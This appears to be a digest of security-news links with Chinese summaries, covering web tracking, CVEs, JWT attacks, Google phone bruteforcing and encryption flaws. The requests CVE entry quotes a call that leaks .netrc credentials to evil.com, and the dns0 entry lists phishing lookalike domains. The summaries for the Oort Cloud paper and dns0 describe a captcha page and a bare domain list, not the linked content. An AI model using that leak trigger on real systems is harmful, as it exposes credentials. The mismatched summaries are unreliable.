Meta and Yandex are de-anonymizing Android users' web browsing identifiersa year agohttps://arstechnica.com/security/2025/06/meta-and-yandex-are-de-anonymizing-andr...Meta和Yandex通过滥用互联网协议将追踪代码嵌入网站,使访客匿名状态失效。Chrome等浏览器向原生应用发送唯一标识符,实现网页ID与移动应用用户身份的持久化关联。该追踪手段绕过了Android和浏览器的沙盒隔离、状态/存储分区等安全防护机制。研究人员指出这违反了基础安全原则,打破了移动端与网页环境间的安全沙箱隔离。Yandex于2017年首创该绕过技术,Meta于去年9月跟进,将浏览历史与应用账户持有者相关联。
CVE-2024-47081: Netrc credential leak in PSF requests librarya year agohttps://seclists.org/fulldisclosure/2025/Jun/2PSF请求库因URL处理不当导致.netrc凭证泄露给第三方漏洞触发方式:调用API requests.get('http://example.com:@evil.com/')时为example.com配置的凭证会被泄露至evil.com根本原因定位在requests/utils.py文件中漏洞已于2024年9月12日向维护者报告,目前暂无修复方案GitHub为此问题分配了CVE编号CVE-2024-47081临时解决方案:在API调用中显式指定凭证以禁用.netrc访问
A Spiral Structure in the Inner Oort Clouda year agohttps://iopscience.iop.org/article/10.3847/1538-4357/adbf9b通过勾选方框确认人类身份的请求如果无法完成请求,请联系支持的说明提供的支持联系链接:https://ioppublishing.org/contacts/
The Guide to JWT Vulnerabilities and Attacks (With Exploitation Examples)a year agohttps://pentesterlab.com/blog/jwt-vulnerabilities-attacks-guideJWT(JSON Web Token)用于Web应用中的身份验证、授权和安全信息交换。JWT由三部分组成:HEADER.PAYLOAD.SIGNATURE,每部分均经过Base64URL编码。常见JWT漏洞包括:未验证签名、接受'none'算法、弱HMAC密钥及算法混淆攻击。密钥ID(kid)注入可能操纵密钥选择流程,导致安全漏洞。通过jwk、jku或x5u标头嵌入攻击者控制的密钥可绕过验证机制。Java的'幽灵签名'漏洞(CVE-2022-21449)可绕过ECDSA签名验证。最佳实践包括:强制严格算法、安全管理密钥及验证所有JWT标头。
A look at Cloudflare's AI-coded OAuth librarya year agohttps://neilmadden.blog/2025/06/06/a-look-at-cloudflares-ai-coded-oauth-library/CloudFlare的新OAuth提供商库主要是在Anthropic的Claude大语言模型协助下编写的,并经过工程师的严格审查。代码结构良好但缺乏全面测试,特别是OAuth标准要求的关键安全检查。安全问题包括过度宽松的CORS头设置、缺少标准安全头信息以及Basic认证的错误实现。该库包含了像隐式授权这样的过时OAuth功能,表明对当前OAuth规范不够熟悉。令牌ID生成存在缺陷,会产生有偏差的输出,这说明对AI生成代码的审查不够充分。令牌存储的加密设计很巧妙,但最初存在缺陷需要专家介入修正。该项目凸显了在认证等关键系统中使用大语言模型时,必须具备深厚专业知识的重要性,因为AI可能会引入严重的安全漏洞。
Bruteforcing the phone number of any Google usera year agohttps://brutecat.com/articles/leaking-google-phones发现谷歌用户名恢复表单存在无需JavaScript即可利用的漏洞该表单允许通过两个HTTP请求验证恢复电话号码是否关联显示名称初始暴力破解尝试因IP速率限制和验证码机制而受阻探索使用IPv6通过轮换IP地址绕过速率限制发现使用JS版表单的BotGuard令牌可绕过无JS表单的请求限制开发概念验证工具(gpb)利用显示名和电话提示暴力破解号码通过Looker Studio识别谷歌账户显示名泄露方法及从电话掩码推断国家代码使用libphonenumber验证和实时BotGuard令牌生成优化暴力破解流程实现每秒约4万次验证的破解速度,根据国家代码缩短所需时间向谷歌提交漏洞报告,获5000美元奖金并最终促使无JS表单停用
A bit more on Twitter/X's new encrypted messaginga year agohttps://blog.cryptographyengineering.com/2025/06/09/a-bit-more-on-twitter-xs-new...XChat的端到端加密缺乏前向保密性,消息使用接收方长期公钥加密。用户私钥存储在X服务器上,仅通过PIN码访问,未采用硬件安全模块(HSM)保护。X的密钥存储协议Juicebox将密钥分片至三台服务器,但均由X控制,存在安全隐患。Juicebox试图通过阈值OPRF增强弱密码,但依赖服务端实施的猜测次数限制。X的Juicebox部署疑似使用纯软件服务器且无HSM,易受暴力破解攻击。阈值OPRF支持分布式密钥生成,但需谨慎实现以避免攻击漏洞。潜在攻击手段包括服务器仿冒和重放攻击,凸显分布式协议的安全复杂性。
The curious case of shell commands, or how "this bug is required by POSIX"a year agohttps://notes.volution.ro/v1/2021/01/notes/502e747f/文章讨论了将命令执行委托给`system(3)`和`sh -c`的工具所引发的问题,这些做法可能导致shell注入漏洞。文中重点指出了`ssh`、`watch`和`i3`等常见工具在处理命令和参数时的误导性行为。文章详细分析了`system(3)`函数及其潜在影响,包括命令参数被错误处理的示例。提出了解决方案和变通方法,例如正确引用和转义命令与参数,以及使用`exec --`避免命令被误解为选项。“耻辱墙”列出了存在不安全行为的工具和库,而“荣誉墙”则表扬了那些安全处理命令执行的工具。讨论了`system(3)`实现中的一个严重缺陷:以连字符开头的命令可能被误解为选项,从而导致意外行为。作者已向相关项目和标准组织报告了这些问题,强调需要更安全的默认设置和更好的文档说明。
Signal may silently fall back to "unsealed sender" message if server returns 401 (2024)a year agohttps://github.com/signalapp/Signal-Android/issues/13842Bug报告指出Signal的SealedSender功能存在漏洞服务器返回401状态码会强制客户端切换至备用SealedSender访问模式对于未共享群组的单聊会话不存在备用方案其他会话可能拥有多个备用方案直至触发空回退机制空回退会将消息转至未加密的认证WebSocket通道,可能导致功能失效恶意服务器可通过针对特定消息返回401状态码来选择性禁用SealedSender加密
Bypassing GitHub Actions policies in the dumbest way possiblea year agohttps://blog.yossarian.net/2025/06/11/github-actions-policies-dumb-bypassGitHub Actions提供了一种策略机制,用于限制仓库、组织或企业中的操作和可重用工作流。该策略机制很容易被绕过,方法是在本地获取操作并通过相对路径使用它们。GitHub不认为这种绕过是安全问题,但作者持不同意见。绕过方法包括克隆操作仓库并在本地使用,而不是直接引用它。建议的修复措施包括将本地使用视为单独的策略类别,或记录这一限制。无效的策略机制可能会产生虚假的安全感,并鼓励人们寻找变通方法。
How easy is it for a developer to "sandbox" a program?a year agohttps://kristaps.bsd.lv/devsecflops/沙盒技术通过源代码内部限制程序对系统资源的访问,例如使用chroot(2)限制文件系统访问。现代操作系统工具允许开发者限制更多资源,包括内存和网络访问,而不仅限于文件系统。本文调查了Linux、OpenBSD、FreeBSD上的沙盒工具,并提及了Mac OS X和Java的相关技术。工具评估基于文档长度和示例使用复杂度,优先选择更简单的工具。以OpenSSH为案例,比较不同沙盒实现的维护情况和随时间的变化。OpenBSD的pledge因其易用性和采用率受到关注,而Linux的seccomp则更为复杂。FreeBSD的Capsicum在FreeBSD社区内应用广泛,文档简洁明了。Mac OS X和Java已弃用其沙盒工具。本文旨在收集开源系统中沙盒使用的数据,并鼓励读者贡献相关信息。致谢部分包括研究人员和贡献者提供的数据和见解。
Frequent reauth doesn't make you more securea year agohttps://tailscale.com/blog/frequent-reath-security频繁的重复认证会打断工作流程并加剧多因素认证疲劳,反而降低安全性安全重点应放在访问管理和实时策略更新上,而非频繁登录认证检查应根据场景验证设备持有或身份真实性频繁登录为攻击者窃取凭证创造了更多可乘之机现代操作系统锁屏功能已能有效保护会话安全,无需频繁登录网站会话过期时间设置往往过短无法防劫持,却又长得足以惹恼用户持续验证和设备状态检查比频繁登录提供更优的安全防护安全措施应具备适应性、智能化特性,并将对用户的干扰降至最低
The European public DNS that makes your Internet safera year agohttps://www.dns0.eu各种网站域名的列表,包括account-netflix.com、0orange.fr、activation-ameli.fr、aidepaypal.com、bougyuestelecom.fr、compte-support-netflix.fr、cpam-carte.fr、dhl-security-account.fr、espace-connexion.fr、identifiant-icloud.fr、labankepoostale.fr和hsbç.fr。部分域名存在重复,例如account-netflix.com、0orange.fr和activation-ameli.fr。该列表似乎是合法域名与潜在可疑或钓鱼相关域名的混合。
Breaking My Security Assignmentsa year agohttps://www.akpain.net/blog/breaking-secnet-assignments/安全作业涉及使用一个虚拟机(VM),其中更新通过加密的GPG文件安装。该虚拟机的更新机制使用GPG加密,配合密码短语文件和存储在/root目录下的密钥。通过本地挂载虚拟机的磁盘,作者获取了必要的文件以手动解密更新。解密后的更新包含用于生成令牌的Java代码,这些令牌使用模块密钥进行AES加密。令牌通过结合练习标识符和随机字符串生成,确保唯一性。作者利用此系统在不完成作业的情况下生成令牌,暴露了一个安全漏洞。防止此类漏洞需要更严格的访问控制,如远程虚拟机,但对大规模班级不切实际。尽管存在漏洞利用,作者承认完成作业对学习和考试准备的重要性。
Introducing Sulka, the Hardened Yocto Distroa year agohttps://ejaaskel.dev/introducing-sulka-the-hardened-yocto-distro/作者正在开发一个名为Sulka的安全型Yocto发行版,其目标是实现自由、简洁且强化安全。Sulka被设计为Yocto默认Poky发行版的极简主义替代方案,专注于安全性。现有安全的Yocto替代方案包括风河Linux、嵌入式工具包Welma、TimeSys VigiShield以及meta-hardening。Sulka是开源的,这使其区别于提供长期支持的商业解决方案。当前功能包括默认拒绝防火墙、非root服务用户、强化SSH以及内核加固。文档和测试是需要改进的领域,预计在1.0.0版本发布前会有重大变更。名称'Sulka'在芬兰语中意为'羽毛',同时也是对'嵌入式系统'的一种双关表达。作者寻求反馈和使用案例,以改进Sulka并确保其实用性。
Show HN: Dual Elliptic Curve Math Backdoor in Pythona year agohttps://leetarxiv.substack.com/p/dual-ec-backdoor-coding-guide美国国家安全局(NSA)在2006年将隐藏的数学后门植入Dual EC DRBG加密标准,使美国政府能够解密SSL互联网流量。2007年微软研究人员发现该后门,揭露Dual EC算法漏洞源于可被操纵的Q值参数。Python代码实现演示了后门原理:在家用电脑上仅需2分钟即可预测28字节的随机数生成数据。不安全的随机数生成器(RNG)曾被用于多种攻击,包括劫持Hacker News账户和入侵安卓版比特币钱包。本文从技术层面深入解析Dual EC RNG及其后门的编程实现,涵盖后门常数生成和随机数输出预测等内容。
Slowing the flow of core-dump-related CVEsa year agohttps://lwn.net/SubscriberLink/1024160/f18b880c8cd1eef1/6.16内核版本对核心转储处理进行了改进,以减少安全漏洞。由于竞态条件和特权辅助进程的存在,核心转储一直是安全问题的来源。新的API改进包括使用pidfd唯一标识崩溃进程,避免PID重用攻击。新的core_pattern语法允许直接将核心转储写入套接字,提高了效率和安全性。Systemd-coredump等工具现在可以用更少的权限处理核心转储,减少了攻击面。这些改进旨在减少未来与核心转储处理相关的CVE漏洞数量。
HTML spec change: escaping < and > in attributesa year agohttps://developer.chrome.com/blog/escape-attributesHTML规范更新:转义属性中的<和>符号以防止mXSS漏洞变更影响Chrome 138版本(Beta版2025年5月28日,稳定版2025年6月24日)修改了HTML片段的序列化方式(涉及innerHTML、outerHTML、getHTML()等方法)不影响HTML解析或DOM API属性获取(如getAttribute、dataset等)可能破坏通过innerHTML/outerHTML提取属性值的现有代码对比HTML与静态值的端到端测试可能需要更新此项变更通过防止突变型XSS实例提升安全性各浏览器 rollout 时间表:Chromium(2025年6月24日)、Firefox(140版本)、Safari 26 Beta(2025年9月)开放针对此变更引发问题的错误报告渠道
CVE-2025-5689: New authd users logging in via SSH are members of the root groupa year agohttps://github.com/ubuntu/authd/security/advisories/GHSA-g8qw-mgjx-rwjrSSH登录的新用户被错误地分配了root组权限,存在安全漏洞。如果用户本不应具有root访问权限,这可能导致本地权限提升。该问题已在提交619ce8e中修复。临时解决方案包括配置SSH服务器,在sshd_config中设置'UsePAM no'或'KbdInteractiveAuthentication no'来禁用authd认证。
Ubuntu Adopts Chrony and NTS for Secure Network Timea year agohttps://www.omgubuntu.co.uk/2025/06/ubuntu-chrony-nts-default-25-10Ubuntu 25.10 '探索短尾矮袋鼠'将用Chrony替代systemd-timesync,新系统默认启用网络时间安全协议(NTS)NTS比NTP更安全,它能验证时间源身份,防止恶意服务器提供错误时间数据NTS使用TCP 4460端口进行密钥交换,UDP 123端口进行NTP通信,确保可靠且经过认证的时间同步时间精确性对证书验证、DNSSEC等加密任务至关重要Ubuntu 25.10新安装将默认使用Chrony+NTS,而从25.04升级的系统会保留systemd-timesyncd(除非手动切换)用户可通过Ubuntu邮件列表提供的命令手动切换至支持NTS的Chrony这项改动提升了安全性,对多数用户的日常使用没有影响